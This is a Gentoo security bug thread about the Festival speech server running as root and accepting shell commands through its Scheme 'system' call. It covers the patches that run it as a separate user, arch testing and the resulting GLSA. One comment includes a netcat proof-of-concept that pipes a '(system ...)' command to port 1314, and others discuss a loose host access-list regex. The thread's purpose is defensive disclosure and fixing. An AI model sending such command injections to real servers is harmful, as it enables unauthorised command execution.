Summary: | app-accessibility/festival: privilege elevation with current default setup | ||
---|---|---|---|
Product: | Gentoo Security | Reporter: | Eugene Medvedev <rn3aoh.g> |
Component: | Default Configs | Assignee: | Gentoo Security <security> |
Status: | RESOLVED FIXED | ||
Severity: | major | CC: | accessibility, brebs, ia64, philantrop, solar, sound, williamh |
Priority: | High | ||
Version: | unspecified | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | B1 [glsa] Falco | ||
Package list: | Runtime testing required: | --- | |
Attachments: |
festival-bug-170477.diff
festival-bug-170477.diff festival-1.95_beta-r3.ebuild festival.rc server.scm |
Description
Eugene Medvedev
2007-03-11 20:10:03 UTC
thanks for your report. CCing maintainer adding herds please comment/fix, since jeeves has not seen williamh for 20days Herds please advise and provide an updated ebuild as necessary. Herds please advise. Herds/Maintainer please advise Herds please advise. Herds please advise. hurry up or mask Created attachment 121219 [details, diff]
festival-bug-170477.diff
How about something like this? Run it as it's own user and set it's shell to /bin/false.
solar@here $ echo '(system "whoami > /tmp/amiroot")' | busybox nc localhost 1314
LP
nil
ft_StUfF_keyOK
solar@here $ cat /tmp/amiroot
festival
I don't know if the 'system' command can/should/could be disabled all together or if there is a better alternative but this meets the initial
posters suggestion.
(In reply to comment #9) > I don't know if the 'system' command can/should/could be disabled all together > or if there is a better alternative but this meets the initial > posters suggestion. It shouldn't be disabled altogether because festival extensively uses it internally (for example, it is required to use mbrola voices). Also, I think I've seen several code examples which involve using it from the client to play the speech festival generates, so you probably can't prevent the client from using it without breaking stuff. But it definitely doesn't have to be root. :) Adding the festival user to the audio group in the ebuild would be a good idea, by the way. (In reply to comment #9) > Created an attachment (id=121219) [edit] > festival-bug-170477.diff > > How about something like this? Run it as it's own user and set it's shell to > /bin/false. It still doesn't stop one for wgetting, building, running shellcode which opens backdoor to experiment with local exploits to gain root privileges.. > It still doesn't stop one for wgetting, building, running shellcode which opens
> backdoor to experiment with local exploits to gain root privileges..
Considering that connections are only allowed from localhost in the default configuration, you have to be a local user already to do that, or am I missing something?
(In reply to comment #10) > Adding the festival user to the audio group in the ebuild would be a good idea, > by the way. Can you please attach an updated diff. cvs -d :pserver:anonymous@anoncvs.gentoo.org:/var/cvsroot \ co gentoo-x86/app-accessibility/festival ... cvs diff -u > foo.diff > Can you please attach an updated diff.
If I knew enough portage, I'd post a diff with that instead of just a bug report in the first place. :)
Oh, almost forgot, just noticed this. The server.scm configuration file that comes with the ebuild actually contains: ; Server access list (hosts) (set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*")) If 192.168.* is allowed, and you can (system "<whatever>") from a different machine, the argument about using festival to try local exploits still stands. Maybe adding a warning to set a server password if you plan to connect to festival remotely is also in order. (In reply to comment #15) > Oh, almost forgot, just noticed this. The server.scm configuration file that > comes with the ebuild actually contains: > > ; Server access list (hosts) > (set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*")) > Question: Would that regexp currently allow remote exec of the "system" command with a domain such as localhost.is.a.myth.gentoo.org ? Created attachment 121309 [details, diff]
festival-bug-170477.diff
That patch sounds good to me despite it is only a poor workaround. Sound herd: someone wants to commit it into the tree or can we commit it ourselves? I am looking at commiting this tonight or tomorrow. Thanks. I have found one issue with this patch so far. The festival server can create a log, and by default that goes to /var/log/festival.log. That does not work if festival is running as a user other than root since /var/log is read-only to any other user. Any suggestions? (In reply to comment #20) > I have found one issue with this patch so far. The festival server can create > a log, and by default that goes to /var/log/festival.log. That does not work > if festival is running as a user other than root since /var/log is read-only to > any other user. Any suggestions? Things like apache, clamav, lighttpd, mysql, snort and squid all use a subdir in /var/log/ that is owned by that user. So you want /var/log/festival/festival.log Created attachment 121494 [details]
festival-1.95_beta-r3.ebuild
Fixes /var/log/festival/ and enewuser. Big cleanup. Not using a diff because it would be larger than the file.
Created attachment 121496 [details]
festival.rc
Runs as "festival" user.
Created attachment 121497 [details]
server.scm
Sets logfile location.
The fix for this has been committed to the tree. I'm not sure whether I can close this or if I should wait for the security team to check it. Please advise. Thx William, now it's time for arches. Arches please test and mark stable. Target keywords are: festival-1.95_beta-r4.ebuild:KEYWORDS="alpha amd64 hppa ia64 ppc ppc64 sparc x86" app-accessibility/festival-1.95_beta-r4 USE="X asterisk -esd -mbrola" 1. emerges on x86 2. passes collision test 3. app-accessibility/gnome-speech-0.4.11 emerges with it 4. works Portage 2.1.2.7 (default-linux/x86/2007.0/desktop, gcc-4.1.2, glibc-2.5-r3, 2.6.20.12 i686) ================================================================= System uname: 2.6.20.12 i686 Genuine Intel(R) CPU T2300 @ 1.66GHz Gentoo Base System release 1.12.9 Timestamp of tree: Sat, 09 Jun 2007 09:00:01 +0000 dev-java/java-config: 1.3.7, 2.0.32 dev-lang/python: 2.3.5-r3, 2.4.4-r4 dev-python/pycrypto: 2.0.1-r5 sys-apps/sandbox: 1.2.17 sys-devel/autoconf: 2.13, 2.61 sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10 sys-devel/binutils: 2.16.1-r3 sys-devel/gcc-config: 1.3.16 sys-devel/libtool: 1.5.22 virtual/os-headers: 2.6.17-r2 ACCEPT_KEYWORDS="x86" AUTOCLEAN="yes" CBUILD="i686-pc-linux-gnu" CFLAGS="-O2 -march=prescott -pipe -fomit-frame-pointer" CHOST="i686-pc-linux-gnu" CONFIG_PROTECT="/etc /usr/kde/3.5/env /usr/kde/3.5/share/config /usr/kde/3.5/shutdown /usr/share/X11/xkb /usr/share/config" CONFIG_PROTECT_MASK="/etc/env.d /etc/env.d/java/ /etc/gconf /etc/php/apache2-php5/ext-active/ /etc/php/cgi-php5/ext-active/ /etc/php/cli-php5/ext-active/ /etc/revdep-rebuild /etc/terminfo /etc/texmf/web2c" CXXFLAGS="-O2 -march=prescott -pipe -fomit-frame-pointer" DISTDIR="/usr/portage/distfiles" EMERGE_DEFAULT_OPTS="--nospinner" FEATURES="collision-protect distlocks metadata-transfer parallel-fetch sandbox sfperms strict test userfetch userpriv usersandbox" GENTOO_MIRRORS="http://mirror.switch.ch/mirror/gentoo/ http://gentoo.inode.at/" LINGUAS="en de en_GB de_CH" MAKEOPTS="-j3" PKGDIR="/usr/portage/packages" PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress --force --whole-file --delete --delete-after --stats --timeout=180 --exclude=/distfiles --exclude=/local --exclude=/packages --filter=H_**/files/digest-*" PORTAGE_TMPDIR="/var/tmp" PORTDIR="/usr/portage" SYNC="rsync://rsync.gentoo.org/gentoo-portage" USE="X a52 aac acl acpi alsa apache2 asf avahi berkdb bitmap-fonts cairo cdr cdrom cli cracklib crypt cups dbus divx dri dts dvd dvdr dvdread eds emboss encode evo fam ffmpeg firefox flac fortran gdbm gif gnome gpm gstreamer gtk hal iconv ipv6 isdnlog java jpeg kde kdeenablefinal kerberos ldap libg++ mad midi mikmod mmx mono mp3 mpeg mudflap ncurses nls nptl nptlonly ogg opengl openmp oss pam pcre pdf perl png pppd python qt3 qt3support qt4 quicktime readline reflection rtsp ruby samba sdl session smp spell spl sse sse2 sse3 ssl svg tcpd test tetex theora threads tiff truetype truetype-fonts type1-fonts unicode vcd vorbis wifi win32codecs wxwindows x264 x86 xine xml xorg xprint xv xvid zlib" ELIBC="glibc" INPUT_DEVICES="keyboard mouse" KERNEL="linux" LINGUAS="en de en_GB de_CH" USERLAND="GNU" VIDEO_CARDS="i810 fbdev vesa" Unset: CTARGET, INSTALL_MASK, LANG, LC_ALL, LDFLAGS, PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS, PORTDIR_OVERLAY ppc stable Stable for HPPA. ppc64 stable Testing festival-1.95_beta-r4 1. Emerges fine 2. Passes collision 3. Works fine 4. no security hole with test case $ emerge --info Portage 2.1.2.7 (default-linux/alpha/2007.0, gcc-4.1.2, glibc-2.5-r2, 2.6.21-gentoo-r1 alpha) ================================================================= System uname: 2.6.21-gentoo-r1 alpha EV56 Gentoo Base System release 1.12.9 Timestamp of tree: Sat, 09 Jun 2007 14:20:01 +0000 distcc 2.18.3 alpha-unknown-linux-gnu (protocols 1 and 2) (default port 3632) [enabled] ccache version 2.4 [enabled] dev-lang/python: 2.4.4-r4 dev-python/pycrypto: 2.0.1-r5 dev-util/ccache: 2.4-r7 sys-apps/sandbox: 1.2.18.1 sys-devel/autoconf: 2.13, 2.61 sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10 sys-devel/binutils: 2.17.50.0.16 sys-devel/gcc-config: 1.3.15-r1 sys-devel/libtool: 1.5.22 virtual/os-headers: 2.6.17-r2 ACCEPT_KEYWORDS="alpha" AUTOCLEAN="yes" CBUILD="alpha-unknown-linux-gnu" CFLAGS="-mieee -pipe -O2 -mcpu=ev56" CHOST="alpha-unknown-linux-gnu" CONFIG_PROTECT="/etc /usr/share/X11/xkb /var/bind" CONFIG_PROTECT_MASK="/etc/env.d /etc/gconf /etc/revdep-rebuild /etc/splash /etc/terminfo" CXXFLAGS="-mieee -pipe -O2 -mcpu=ev56" DISTDIR="/usr/portage/distfiles" FEATURES="ccache collision-protect distcc distlocks metadata-transfer parallel-fetch sandbox sfperms strict test" GENTOO_MIRRORS="http://distfiles.gentoo.org http://distro.ibiblio.org/pub/linux/distributions/gentoo" LINGUAS="en" MAKEOPTS="-j3" PKGDIR="/usr/portage/packages" PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress --force --whole-file --delete --delete-after --stats --timeout=180 --exclude=/distfiles --exclude=/local --exclude=/packages --filter=H_**/files/digest-*" PORTAGE_TMPDIR="/var/tmp" PORTDIR="/usr/portage" PORTDIR_OVERLAY="/usr/portage/local/overlay" SYNC="rsync://eldest/gentoo-portage" USE="X acl alpha alsa berkdb bitmap-fonts bzip2 cli cracklib crypt cups curl dri fortran gdbm gpm iconv ipv6 isdnlog ldap libg++ logrotate midi mudflap ncurses nls nptl nptlonly openmp pam pcre perl postfix pppd python readline reflection session spl sqlite ssl startup-notification tcpd test truetype-fonts type1-fonts unicode xorg zlib" ALSA_CARDS="au8810" ALSA_PCM_PLUGINS="adpcm alaw asym copy dmix dshare dsnoop empty extplug file hooks iec958 ioplug ladspa lfloat linear meter mulaw multi null plug rate route share shm softvol" ELIBC="glibc" INPUT_DEVICES="evdev keyboard mouse joystick" KERNEL="linux" LCD_DEVICES="bayrad cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses text" LINGUAS="en" USERLAND="GNU" VIDEO_CARDS="vga s3virge nv cirrus" Unset: CTARGET, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LANG, LC_ALL, LDFLAGS, PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS stable on alpha. Brian++ Marked stable on amd64. x86 stable, thanks Markus. sparc stable. ia64 is there something wrong with stabilization? ia64 is not security supported :) Plus i can't test it err, indeed :) it's GLSA 200707-10, thanks |